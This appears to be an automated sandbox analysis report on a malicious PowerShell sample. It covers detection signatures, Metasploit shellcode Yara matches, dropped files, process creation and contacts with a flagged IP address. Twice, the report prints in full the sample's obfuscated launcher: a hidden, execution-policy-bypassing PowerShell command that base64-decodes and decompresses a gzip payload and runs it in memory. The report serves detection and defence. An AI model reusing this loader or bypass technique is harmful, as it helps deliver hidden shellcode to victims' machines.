Windows Analysis Report
x6bjOrKFQn.ps1

Overview

General Information

Sample name: x6bjOrKFQn.ps1
renamed because original name is a hash value
Original sample name: bfa856e4339bfadacdcb6730a256353e0b09dd0d20f0571bed84a4226b65b740.ps1
Analysis ID: 1542797
MD5: b2cc4f57ccfdb79e1f65bdcc203afecb
SHA1: 56be6d9cfc79e265765f4fa4a13a34f422c28c94
SHA256: bfa856e4339bfadacdcb6730a256353e0b09dd0d20f0571bed84a4226b65b740
Tags: 206-41-208-89ps1user-JAMESWT_MHT
Infos:

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Bypasses PowerShell execution policy
Found suspicious powershell code related to unpacking or dynamic code loading
Machine Learning detection for dropped file
Obfuscated command line found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Gzip Archive Decode Via PowerShell
Sigma detected: Suspicious FromBase64String Usage On Gzip Archive - Process Creation
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

AV Detection
barindex
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\jntjspe1\jntjspe1.dll Avira: detection malicious, Label: TR/Rozena.Gen
Multi AV Scanner detection for submitted file
Source: x6bjOrKFQn.ps1 ReversingLabs: Detection: 26%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 99.4% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\jntjspe1\jntjspe1.dll Joe Sandbox ML: detected
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1893833318.000001E27617E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1893833318.000001E2761A6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbR] source: powershell.exe, 00000004.00000002.1893833318.000001E27617E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dbpdbtem.pdb source: powershell.exe, 00000004.00000002.1893833318.000001E27617E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbt\ source: powershell.exe, 00000004.00000002.1893833318.000001E27617E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbc~ source: powershell.exe, 00000004.00000002.1893833318.000001E2761A6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbA source: powershell.exe, 00000004.00000002.1893833318.000001E2761A6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\jntjspe1\jntjspe1.pdb source: powershell.exe, 00000000.00000002.1748447398.000001FDE7C72000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbl source: powershell.exe, 00000004.00000002.1893833318.000001E2761A6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\jntjspe1\jntjspe1.pdbhP source: powershell.exe, 00000000.00000002.1748447398.000001FDE7C72000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.pdbs\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000004.00000002.1893833318.000001E2761A6000.00000004.00000020.00020000.00000000.sdmp
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 206.41.208.89 206.41.208.89
Source: unknown TCP traffic detected without corresponding DNS query: 206.41.208.89
Source: unknown TCP traffic detected without corresponding DNS query: 206.41.208.89
Source: unknown TCP traffic detected without corresponding DNS query: 206.41.208.89
Source: powershell.exe, 00000000.00000002.1832364726.000001FDF68C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1748447398.000001FDE87BB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1883737331.000001E26DF92000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1883737331.000001E26DE25000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000004.00000002.1767905639.000001E25DFD9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.1748447398.000001FDE6641000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1767905639.000001E25DDB1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.1748447398.000001FDE8672000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000004.00000002.1767905639.000001E25DFD9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.1748447398.000001FDE6641000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1767905639.000001E25DDB1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000004.00000002.1883737331.000001E26DE25000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000004.00000002.1883737331.000001E26DE25000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000004.00000002.1883737331.000001E26DE25000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000004.00000002.1767905639.000001E25DFD9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.1748447398.000001FDE7C72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000000.00000002.1832364726.000001FDF68C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1748447398.000001FDE87BB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1883737331.000001E26DE25000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000000.00000002.1748447398.000001FDE8672000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000000.00000002.1748447398.000001FDE8672000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oneget.orgX
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 0.2.powershell.exe.1fde84bce30.1.raw.unpack, type: UNPACKEDPE Matched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
Source: 0.2.powershell.exe.1fde84bce30.1.raw.unpack, type: UNPACKEDPE Matched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
Source: 0.2.powershell.exe.1fde84bc000.2.raw.unpack, type: UNPACKEDPE Matched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
Source: 0.2.powershell.exe.1fde84bc000.2.raw.unpack, type: UNPACKEDPE Matched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
Source: 00000000.00000002.1748293931.000001FDE6620000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
Source: 00000000.00000002.1748293931.000001FDE6620000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
Source: 00000000.00000002.1748447398.000001FDE7C72000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
Source: 00000000.00000002.1748447398.000001FDE7C72000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
Source: Process Memory Space: powershell.exe PID: 7532, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7760, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Detected potential crypto function
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_000001FDE66200CA 0_2_000001FDE66200CA
Yara signature match
Source: 0.2.powershell.exe.1fde84bce30.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
Source: 0.2.powershell.exe.1fde84bce30.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
Source: 0.2.powershell.exe.1fde84bc000.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
Source: 0.2.powershell.exe.1fde84bc000.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
Source: 00000000.00000002.1748293931.000001FDE6620000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
Source: 00000000.00000002.1748293931.000001FDE6620000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
Source: 00000000.00000002.1748447398.000001FDE7C72000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
Source: 00000000.00000002.1748447398.000001FDE7C72000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 7532, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7760, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine Classification label: mal100.expl.evad.winPS1@8/15@0/1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF594778.TMP Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7540:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fknazxxb.my5.ps1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA Jump to behavior
Source: x6bjOrKFQn.ps1 ReversingLabs: Detection: 26%
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\x6bjOrKFQn.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jntjspe1\jntjspe1.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES45B2.tmp" "c:\Users\user\AppData\Local\Temp\jntjspe1\CSCD361E481240445E599A964E0407F16C0.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAANCGWcCA5VVXW/jNhB8{2}6{2}YGG'+'ojITL'+'huEFxDZBDXV2uCJDeGae0eTAMhKbW'+'sRqadEkqtpH4v5eUqA/HCdrTgy1xl8Ph7Cy5KA{1}zuRTwO5rBHc4Zz1EY6D33wD7BhsElfMHN4Ov8b2{1}GBre7NX6hK7SDhtj8pMyvk8mfGj/hghbcJAozG8kp1xYiMKrAJmui5HZ'+'HXmXY8c5Indvb{2}xY1xbXcoLJflh2U8{1}lVdBVW7{2}PUqFw8zIJErlZUZPHhaKo5k+LV4Ce5EVzSrByNPKaSDLUGL8BKZgVHR/DXMIIqJV{2}AWC8DA/wH+vNcZP2oDFbzyrk8'+'1wYFKjt5mu'+'7s+4o41VLJHtFocsvWNz5jdn7+0/E8og1Vxi3rFy6jvkKXnbwxY7g2Fq+qRlgx2b/HVuETKo3HhBvoTsXfIp5M/EL{2}0fBncn5GRsMP5MMv/dhuw6/dq+TTRiFd'+'ObIVNrE2S8sxS7KlV1WnYuec0vfF6HDTmqc12Dv0kBUqNzuS1qmhXz8OFtZSGIfPwa1F38OAapgezPmGK2kw{1}WXyRc6owb8ozzPqfJd{1}zueUPc6i6A06ZFyYpTOtmzTW7wgTiILzuG+4Phv1PZ0uWiNTu82ujtP5zuB0NgvcvzPjkFho+7z88Dzce6lR'+'ZHU4nBrcGoKCycw5/eJinCbX15GT/zeXE/bvrGXlRsPENVW6RM5BFULYbLDiFNratg+nEKB4unBfwjX{2}qR2zdWoCTK7WhWmD{2}yKR653KH5YGwiSCP3KmpJYLA4lUa6lKP{1}mM3WIuSYNCi/2EGbkX{2'+'}8I70stB7mxlMGw3Fg/j{2}oPcoHgwy66L6nbu+ujIRt+n0vR0BjcW0snijwLS8Px+rvWsz1JdUba0nCt{1}yEVz1LRZLW33hAcndETq3VaHWY0UvVyLJ/mIg6vt2mqrrd4Nyr5rqc0y5xiG{1}V66rtrEN6RZWHkshmEMw{1}H7CAYCYXgk6ZXTD7Nbq+V7l4XvUpdCSo2vvOYtiu016qh00PxhUe6uFhWCPHpVTd'+'uarphH+4ZBfepV4KOPP57BC3wtzKBCBW+eA6gRlILUwKdwMknhxP6X+t{2}IVno4IhNqli76EU5akK0jEqBSUk2Hs4PFOqzLOGEcq{1}qjtx'+'hcdj{2}sq217xw'+'b+X/5tYf7TsV3DHvm1nvOZF3rZ3IP+4PEne8KlRr+fsh3r66lrmPbOSo1c1xeV/7XObK74p'+'nb+svoXSh3FRKgIAAA{0}')-f'=','Q','9')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jntjspe1\jntjspe1.cmdline" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAANCGWcCA5VVXW/jNhB8{2}6{2}YGG'+'ojITL'+'huEFxDZBDXV2uCJDeGae0eTAMhKbW'+'sRqadEkqtpH4v5eUqA/HCdrTgy1xl8Ph7Cy5KA{1}zuRTwO5rBHc4Zz1EY6D33wD7BhsElfMHN4Ov8b2{1}GBre7NX6hK7SDhtj8pMyvk8mfGj/hghbcJAozG8kp1xYiMKrAJmui5HZ'+'HXmXY8c5Indvb{2}xY1xbXcoLJflh2U8{1}lVdBVW7{2}PUqFw8zIJErlZUZPHhaKo5k+LV4Ce5EVzSrByNPKaSDLUGL8BKZgVHR/DXMIIqJV{2}AWC8DA/wH+vNcZP2oDFbzyrk8'+'1wYFKjt5mu'+'7s+4o41VLJHtFocsvWNz5jdn7+0/E8og1Vxi3rFy6jvkKXnbwxY7g2Fq+qRlgx2b/HVuETKo3HhBvoTsXfIp5M/EL{2}0fBncn5GRsMP5MMv/dhuw6/dq+TTRiFd'+'ObIVNrE2S8sxS7KlV1WnYuec0vfF6HDTmqc12Dv0kBUqNzuS1qmhXz8OFtZSGIfPwa1F38OAapgezPmGK2kw{1}WXyRc6owb8ozzPqfJd{1}zueUPc6i6A06ZFyYpTOtmzTW7wgTiILzuG+4Phv1PZ0uWiNTu82ujtP5zuB0NgvcvzPjkFho+7z88Dzce6lR'+'ZHU4nBrcGoKCycw5/eJinCbX15GT/zeXE/bvrGXlRsPENVW6RM5BFULYbLDiFNratg+nEKB4unBfwjX{2}qR2zdWoCTK7WhWmD{2}yKR653KH5YGwiSCP3KmpJYLA4lUa6lKP{1}mM3WIuSYNCi/2EGbkX{2'+'}8I70stB7mxlMGw3Fg/j{2}oPcoHgwy66L6nbu+ujIRt+n0vR0BjcW0snijwLS8Px+rvWsz1JdUba0nCt{1}yEVz1LRZLW33hAcndETq3VaHWY0UvVyLJ/mIg6vt2mqrrd4Nyr5rqc0y5xiG{1}V66rtrEN6RZWHkshmEMw{1}H7CAYCYXgk6ZXTD7Nbq+V7l4XvUpdCSo2vvOYtiu016qh00PxhUe6uFhWCPHpVTd'+'uarphH+4ZBfepV4KOPP57BC3wtzKBCBW+eA6gRlILUwKdwMknhxP6X+t{2}IVno4IhNqli76EU5akK0jEqBSUk2Hs4PFOqzLOGEcq{1}qjtx'+'hcdj{2}sq217xw'+'b+X/5tYf7TsV3DHvm1nvOZF3rZ3IP+4PEne8KlRr+fsh3r66lrmPbOSo1c1xeV/7XObK74p'+'nb+svoXSh3FRKgIAAA{0}')-f'=','Q','9')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES45B2.tmp" "c:\Users\user\AppData\Local\Temp\jntjspe1\CSCD361E481240445E599A964E0407F16C0.TMP" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: linkinfo.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntshrui.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskflowdataengine.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cdp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dsreg.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: cryptbase.dll Jump to behavior
